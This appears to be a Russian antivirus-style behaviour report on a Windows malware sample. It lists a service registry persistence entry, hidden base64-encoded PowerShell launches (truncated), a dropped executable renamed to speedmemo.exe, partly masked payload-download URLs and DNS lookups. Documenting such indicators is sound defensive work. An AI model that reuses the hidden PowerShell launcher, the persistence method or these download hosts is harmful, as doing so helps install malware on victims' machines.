Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\speedmemo] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\speedmemo] 'ImagePath' = '"%WINDIR%\SysWOW64\speedmemo.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe в %WINDIR%\syswow64\speedmemo.exe
- %HOMEPATH%\666.exe
- http://os####developer.com/pay/fjlMbuIg/
- http://ba###afe.com/wp-content2/91iwhvle00-0nq1xldstn-293/
- http://15#.#83.25.24/x6RrMU4tSULv
- DNS ASK co###print.net
- DNS ASK st####tphysio.ca
- DNS ASK os####developer.com
- DNS ASK ba###afe.com
- DNS ASK wo###sales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...' (со скрытым окном)